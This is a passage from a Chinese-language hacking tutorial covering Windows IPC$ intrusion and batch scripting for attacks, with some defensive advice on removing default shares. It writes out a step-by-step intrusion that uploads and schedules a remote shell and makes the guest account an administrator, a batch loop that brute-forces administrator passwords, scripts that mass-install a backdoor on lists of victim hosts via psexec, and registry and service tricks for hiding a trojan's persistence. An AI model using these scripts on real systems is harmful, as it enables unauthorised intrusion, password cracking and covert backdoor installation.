,这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开

放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已

运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有

防火墙,杀不了)建议放弃。


七 如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会

话》)
首先运行regedit,找到如下组建

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把

RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会

发生,比如一些WIN的服务出现问题等等)

2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Paramete

rs]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Paramete

rs]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。

3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用

4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大



5设置复杂密码,防止通过ipc$穷举密码


八 相关命令
1)建立空连接:
net use \\IP\ipc$ "" /user:""    (一定要注意:这一行命令中包含了3个空格)

2)建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码"  (同样有3个空格)

3)映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名"    (即可将对方的c盘映射为自己的z

盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z:

\\IP\c$

4)删除一个ipc$连接
net use \\IP\ipc$ /del

5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认


九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创

作者!(不知道是哪位前辈)

11. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名"
一般用流光,通过扫描弱口令来得到,管理员帐号和密码.
2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的

c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什

么地方去了)。
  
3. C:\>net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2004/6/15 上午 11:00,命令成功完成。
  
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧

5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2004/6/15 上午 11:05,那就准备

开始下面的命令。
  
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的

是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打

算建立一个Telnet服务!这就要用到ntlm了
  
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
  
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这

个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使

用"net start telnet"来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作

一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组  
10. C:\>net user guest /active:yes
将对方的Guest用户激活

11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码

12. C:\>net localgroup administrators guest /add
将Guest变为Administrator(如果管理员密码更改,guest帐号没改变的话,下次我们

可以用guest再次访问这台计算机)
--------------------------------------------------------------------------
ipc$常见问题:

1,怎样建立空连接,它有什么用?
答:使用命令 net use \IPipc$ "" /user:"" 就可以简单地和目标建立一个空连接(

需要目标开放ipc$)。
对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权

限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实

现也不方便,需借助工具。

2.为什么我连不上IPC$?
答:1.只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能

的。
2.确认你的命令没有打错。正确的命令是: net use \目标IPipc$ "密码" /user:"用

户名"
注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空

密码用""表示。

3,根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未

启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,

请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。

(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。

4,关于ipc$连不上的问题比较复杂,没有总结出一个统一的认识,在肉鸡上实验有时

会得出矛盾的结论,十分棘手。 而且知道了问题所在,如果没有用其他办法获得

shell,很多问题依然不能解决。

5,怎样打开目标的IPC$?
答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。

当然,这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$

来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关

服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话

(比如有防火墙,杀不了)建议放弃。

6,怎样映射和访问默认共享?
答:使用命令 net use z: \目标IPc$ "密码" /user:"用户名" 将对方的c盘映射为自

己的z盘,其他盘类推。
如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe

\IPd$pathmuma.exe 。或者再映射也可以,只是不用用户名和密码了:net use y:

\IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包含空格时,须用""将路

径全引住。

7,如何删除映射和ipc$连接?
答:用命令 net use \IPipc$ /del 删除和一个目标的ipc$连接。
用命令 net use z: /del 删除映射的z盘,其他盘类推。
用命令 net use * /del 删除全部。会有提示要求按y确认。

8,连上ipc$然后我能做什么?
答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“

交流”了。你可以使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit

、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共

享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。

像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是

2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带

的说明或相关教程。

9,怎样防止别人用ips$和默认共享入侵我?
答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表


1,先把已有的删除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………(有几个删几个)
2,禁止别人空连接
?? ?? 首先运行regedit,找到如下主键

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous

(DWORD)的键值改为:00000002。
?? ? 3,禁止自动打开默认共享
?? ?? 对于server版,找到如下主键

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把

AutoShareServer(DWORD)的键值改为:00000000。
对于pro版,则是

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把

AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建一个再改键值。
B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)
net stop lanmanserver
可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于

lanmanserver。一般情况按y继续就可以了。
C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,

ipc$将为进一步入侵提供方便。
D、还有一个办法就是装防火墙,或者端口过滤。
-----------------------------------------------------------------
简明批处理教程:

批处理命令如果运用得当,威力强大无人能敌!是不是想学习了呢,从今天我将把批处

理的常用命令陆续的介绍给大家,如果大家有什么不懂的地方,可以写下评论:

批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat

或 .cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调

用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。
一.简单批处理内部命令简介
1.Echo 命令
打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当

前回显设置。
语法
echo [{on off}] [message]
Sample:@echo off / echo hello world
在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> )结合

来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。

2.@ 命令
表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然

不能让对方看到你使用的命令啦。
Sample:@echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是

微软留了个autoset这个参数给我们,效果和/y是一样的。)

3.Goto 命令
指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。
语法:goto label (label是参数,指定所要转向的批处理程序中的行。)
Sample:
if {%1}=={} goto noparms
if {%2}=={} goto noparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面

会有详细的解释。)
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字

母是标签,goto命令就是根据这个:来寻找下一步跳到到那里。最好有一些说明这样

你别人看起来才会理解你的意图啊。

4.Rem 命令
注释命令,在C语言中相当与/*--------*/,它并不会被执行,只是起一个注释的作用

,便于别人阅读和你自己日后修改。
Rem Message
Sample:@Rem Here is the description.
5.Pause 命令
运行 Pause 命令时,将显示下面的消息:
Press any key to continue . . .
Sample:
@echo off
:begin
copy a:*.* d:\back
echo Please put a new disk into driver A
pause
goto begin
在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示

您将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后

按任意键继续处理。

6.Call 命令
从一个批处理程序调用另一个批处理程序,并且不终止父批处理程序。call 命令接受

用作调用目标的标签。如果在脚本或批处理文件外使用 Call,它将不会在命令行起作

用。
语法
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
参数
[Drive:}[Path] FileName
指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展

名。

7.start 命令
调用外部程序,所有的DOS命令和命令行程序都可以由start命令来调用。
入侵常用参数:
MIN 开始时窗口最小化
SEPARATE 在分开的空间内开始 16 位 Windows 程序
HIGH 在 HIGH 优先级类别开始应用程序
REALTIME 在 REALTIME 优先级类别开始应用程序
WAIT 启动应用程序并等候它结束
parameters 这些为传送到命令/程序的参数
执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就返回命令提

示。如果在命令脚本内执行,该新行为则不会发生。
8.choice 命令
choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。使用时应该

加/c:参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234……
如: choice /c:dme defrag,mem,end
将显示
defrag,mem,end[D,M,E]?
Sample:
Sample.bat的内容如下:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag (应先判断数值最高的错误码)
if errorlevel 2 goto mem
if errotlevel 1 goto end

:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye

此文件运行后,将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ,然后if语句将

作出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示

执行标号为end的程序段,每个程序段最后都以goto end将程序跳到end标号处,然后

程序将显示good bye,文件结束。
9.If 命令

if 表示将判断是否符合规定的条件,从而决定执行不同的命令。 有三种格式:
1、if "参数" == "字符串"  待执行的命令
参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个

等号)
如if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms

2、if exist 文件名  待执行的命令
如果有指定的文件,则条件成立,运行命令,否则运行下一句。
如if exist config.sys edit config.sys

3、if errorlevel / if not errorlevel 数字  待执行的命令
如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。
如if errorlevel 2 goto x2  
DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的

返回码为0、1。

10.for 命令
for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。
在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable

for {%variable|%%variable} in (set) do command [ CommandLineOptions]
%variable 指定一个单一字母可替换的参数。
(set) 指定一个或一组文件。可以使用通配符。
command 指定对每个文件执行的命令。
command-parameters 为特定命令指定参数或命令行开关。
在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable
而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I

如果命令扩展名被启用,下列额外的 FOR 命令格式会受到
支持:

FOR /D %variable IN (set) DO command [command-parameters]

如果集中包含通配符,则指定与目录名匹配,而不与文件
名匹配。

FOR /R [[drive:]path] %variable IN (set) DO command [command-

检查以 [drive:]path 为根的目录树,指向每个目录中的
FOR 语句。如果在 /R 后没有指定目录,则使用当前
目录。如果集仅为一个单点(.)字符,则枚举该目录树。

FOR /L %variable IN (start,step,end) DO command [command-para

该集表示以增量形式从开始到结束的一个数字序列。
因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生
序列 (5 4 3 2 1)。

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command

或者,如果有 usebackq 选项:

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command

filenameset 为一个或多个文件名。继续到 filenameset 中的
下一个文件之前,每份文件都已被打开、读取并经过处理。
处理包括读取文件,将其分成一行行的文字,然后将每行
解析成零或更多的符号。然后用已找到的符号字符串变量值
调用 For 循环。以默认方式,/F 通过每个文件的每一行中分开
的第一个空白符号。跳过空白行。您可通过指定可选 "options"
参数替代默认解析操作。这个带引号的字符串包括一个或多个
指定不同解析选项的关键字。这些关键字为:

eol=c - 指一个行注释字符的结尾(就一个)
skip=n - 指在文件开始时忽略的行数。
delims=xxx - 指分隔符集。这个替换了空格和跳格键的
默认分隔符集。
tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代
的 for 本身。这会导致额外变量名称的
格式为一个范围。通过 nth 符号指定 m
符号字符串中的最后一个字符星号,
那么额外的变量将在最后一个符号解析之
分配并接受行的保留文本。
usebackq - 指定新语法已在下类情况中使用:
在作为命令执行一个后引号的字符串并且
引号字符为文字字符串命令并允许在 fi
中使用双引号扩起文件名称。

sample1:
FOR /F "eol=;;; tokens=2,3* delims=, " %i in (myfile.txt) do command

会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将
每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或
空格定界符号。请注意,这个 for 程序体的语句引用 %i 来
取得第二个符号,引用 %j 来取得第三个符号,引用 %k
来取得第三个符号后的所有剩余符号。对于带有空格的文件
名,您需要用双引号将文件名括起来。为了用这种方式来使
用双引号,您还需要使用 usebackq 选项,否则,双引号会
被理解成是用作定义某个要分析的字符串的。

%i 专门在 for 语句中得到说明,%j 和 %k 是通过
tokens= 选项专门得到说明的。您可以通过 tokens= 一行
指定最多 26 个符号,只要不试图说明一个高于字母 'z' 或
'Z' 的变量。请记住,FOR 变量是单一字母、分大小写和全局的;
同时不能有 52 个以上都在使用中。

您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是,
用单引号将括号之间的 filenameset 括起来。这样,该字符
串会被当作一个文件中的一个单一输入行。

最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将
括号之间的 filenameset 变成一个反括字符串。该字符串会
被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进
内存,并被当作文件分析。因此,以下例子:

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

会枚举当前环境中的环境变量名称。

另外,FOR 变量参照的替换已被增强。您现在可以使用下列
选项语法:

~I - 删除任何引号("),扩充 %I
%~fI - 将 %I 扩充到一个完全合格的路径名
%~dI - 仅将 %I 扩充到一个驱动器号
%~pI - 仅将 %I 扩充到一个路径
%~nI - 仅将 %I 扩充到一个文件名
%~xI - 仅将 %I 扩充到一个文件扩展名
%~sI - 扩充的路径只含有短名
%~aI - 将 %I 扩充到文件的文件属性
%~tI - 将 %I 扩充到文件的日期/时间
%~zI - 将 %I 扩充到文件的大小
%~$PATH:I - 查找列在路径环境变量的目录,并将 %I 扩充
到找到的第一个完全合格的名称。如果环境变量
未被定义,或者没有找到文件,此组合键会扩充
空字符串

可以组合修饰符来得到多重结果:

%~dpI - 仅将 %I 扩充到一个驱动器号和路径
%~nxI - 仅将 %I 扩充到一个文件名和扩展名
%~fsI - 仅将 %I 扩充到一个带有短名的完整路径名
%~dp$PATH:i - 查找列在路径环境变量的目录,并将 %I 扩充
到找到的第一个驱动器号和路径。
%~ftzaI - 将 %I 扩充到类似输出线路的 DIR

在以上例子中,%I 和 PATH 可用其他有效数值代替。%~ 语法
用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名
比较易读,而且避免与不分大小写的组合键混淆。

以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。

sample2:

利用For命令来实现对一台目标Win2k主机的暴力密码破解。
我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行

连接,当成功时记下密码。
最主要的命令是一条:for /f i% in (dict.txt) do net use \\ip\ipc$ "i%"
/u:"administrator"
用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将

程序运行结果传递给find命令--
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%"
/u:"administrator"|find ":命令成功完成">>D:\ok.txt ,这样就ko了。

sample3:

你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本

很开心的一件事都会变得很郁闷:)。文章开头就谈到使用批处理文件,可以简化日

常或重复性任务。那么如何实现呢?呵呵,看下去你就会明白了。


主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%

variable)
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat
%%i %%j %%k
tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递

给door.bat中的参数%i %j %k。
而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到

victim,然后用返回码(If
errorlever =)来筛选成功种植后门的主机,并echo出来,或者echo到指定的文件。
delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这

victim.txt里的内容是什么样的了。应该根据%%i
%%j %%k表示的对象来排列,一般就是 ip password username。
代码雏形:
--------------- cut here then save as a batchfile(I call it main.bat )
---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call
IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat )
---------------------------


------------------- cut here then save as a batchfile(I call it door.bat)
-----------------------------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1
USER %2 PWD %3 >>ko.txt
@psexec \\%1 c:\winnt\system32\windrv32.exe
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored
>>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat)
--------------------------------
这只是一个自动种植后门批处理的雏形,两个批处理和后门程序

(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容
尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以

使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.


二.如何在批处理文件中使用参数
批处理中可以使用参数,一般从1%到 9%这九个,当有多个参数时需要用shift来移动

,这种情况并不多见,我们就不考虑它了。
sample1:fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
这个例子用于连续地格式化几张软盘,所以用的时候需在dos窗口输入fomat.bat a,

呵呵,好像有点画蛇添足了~^_^
sample2:
当我们要建立一个IPC$连接地时候总要输入一大串命令,弄不好就打错了,所以我们

不如把一些固定命令写入一个批处理,把肉鸡地ip password
username 当着参数来赋给这个批处理,这样就不用每次都打命令了。
@echo off
@net use \\1%\ipc$ "2%" /u:"3%" 注意哦,这里PASSWORD是第二个参数。
@if errorlevel 1 echo connection failed
怎么样,使用参数还是比较简单的吧?你这么帅一定学会了^_^.No.3
三.如何使用组合命令(Compound Command)

1.&

Usage:第一条命令 & 第二条命令 [& 第三条命令...]

用这种方法可以同时执行多条命令,而不管命令是否执行成功

Sample:
C:\>dir z: & dir c:\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of c:\Ex4rch

2002-05-14 23:51 <DIR> .
2002-05-14 23:51 <DIR> ..
2002-05-14 23:51 14 sometips.gif

2.&&

Usage:第一条命令 && 第二条命令 [&& 第三条命令...]

用这种方法可以同时执行多条命令,当碰到执行出错的命令后将不执行后面的命令,

如果一直没有出错则一直执行完所有命令;

Sample:
C:\>dir z: && dir c:\Ex4rch
The system cannot find the path specified.

C:\>dir c:\Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of c:\Ex4rch

2002-05-14 23:55 <DIR> .
2002-05-14 23:55 <DIR> ..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.

在做备份的时候可能会用到这种命令会比较简单,如:
dir file://192.168.0.1/database/backup.mdb && copy
file://192.168.0.1/database/backup.mdb E:\backup
如果远程服务器上存在backup.mdb文件,就执行copy命令,若不存在该文件则不执行

copy命令。这种用法可以替换IF exist了 :)

3.||

Usage:第一条命令 || 第二条命令 [|| 第三条命令...]

用这种方法可以同时执行多条命令,当碰到执行正确的命令后将不执行后面的命令,

如果没有出现正确的命令则一直执行完所有命令;

Sample:
C:\Ex4rch>dir sometips.gif || del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of C:\Ex4rch

2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free

组合命令使用的例子:
sample:
@copy trojan.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1
USER %2 PASS %3 >>victim.txt

四、管道命令的使用

1.| 命令
Usage:第一条命令 | 第二条命令 [| 第三条命令...]
将第一条命令的结果作为第二条命令的参数来使用,记得在unix中这种方式很常见。

sample:
time /t>>D:\IP.log
netstat -n -p tcp|find ":3389">>D:\IP.log
start Explorer
看出来了么?用于终端服务允许我们为用户自定义起始的程序,来实现让用户运行下

面这个bat,以获得登录用户的IP。

2.>、>>输出重定向命令
将一条命令或某个程序输出结果的重定向到特定文件中, > 与
>>的区别在于,>会清除调原有文件中的内容后写入指定文件,而>>只会追加内容到指

定文件中,而不会改动其中的内容。

sample1:
echo hello world>c:\hello.txt (stupid example?)

sample2:
时下DLL木马盛行,我们知道system32是个捉迷藏的好地方,许多木马都削尖了脑袋往

那里钻,DLL马也不例外,针对这一点我们可以在安装好系统和必要的应用程序后,对

该目录下的EXE和DLL文件作一个记录:

运行CMD--转换目录到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,
这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中,
日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木

马了.
这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和

dllback1.txt中,然后运行:
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt
dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到

diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、

版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是

最好,如果有的话也不要直接DEL掉,先用regsvr32
/u trojan.dll将后门DLL文件注销掉,再把它移到回收站里,若系统没有异常反映再将

之彻底删除或者提交给杀毒软件公司。

3.< 、>& 、<&
< 从文件中而不是从键盘中读入命令输入。
>& 将一个句柄的输出写入到另一个句柄的输入中。
<& 从一个句柄读取输入并将其写入到另一个句柄输出中。
这些并不常用,也就不多做介绍。

No.5
五.如何用批处理文件来操作注册表

在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏

后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们

也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作

有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用

批处理来生成一个REG文件)

关于注册表的操作,常见的是创建、修改、删除。

1.创建
创建分为两种,一种是创建子项(Subkey)

我们创建一个文件,内容如下:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]

然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个

名字为“hacker”的子项。

另一种是创建一个项目名称
那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如

下:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"Door"=C:\\WINNT\\system32\\door.exe
"Autodos"=dword:02

这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]


新建了:Invader、door、about这三个项目
Invader的类型是“String Value”
door的类型是“REG SZ Value”
Autodos的类型是“DWORD Value”


2.修改
修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然

后导入(regedit /s)即可。

3.删除
我们首先来说说删除一个项目名称,我们创建一个如下的文件:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Ex4rch"=-

执行该脚本,

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下

的"Ex4rch"就被删除了;


我们再看看删除一个子项,我们创建一个如下的脚本:

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

执行该脚本,

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被

删除了。


相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特

定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类

型的文件。


samlpe1:如上面的那个例子,如想生成如下注册表文件
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要这样:
@echo Windows Registry Editor Version 5.00>>Sample.reg

@echo
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

>Sample.reg

@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg


samlpe2:
我们现在在使用一些比较老的木马时,可能会在注册表的

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、

Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露

木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对

安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe)

@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
>>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname=
WindowsDriver binpath= c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@delete patch.dll

@REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时

将其属性设为隐藏和只读,并config为自启动]
@REM 这样不是更安全^_^.

六.精彩实例放送。
1.删除win2k/xp系统默认共享的批处理
------------------------ cut here then save as .bat or .cmd file
---------------------------

@echo preparing to delete all the default shares.when ready pres any key.
@pause
@echo off

:Rem check parameters if null show usage.
if {%1}=={} goto :Usage

:Rem code start.
echo.
echo ------------------------------------------------------
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
net share %2$ /delete
net share %3$ /delete
net share %4$ /delete
net share %5$ /delete
net share %6$ /delete
net share %7$ /delete
net share %8$ /delete
net share %9$ /delete
net stop Server
net start Server
echo.
echo All the shares have been deleteed
echo.
echo ------------------------------------------------------
echo.
echo Now modify the registry to change the system default properties.
echo.
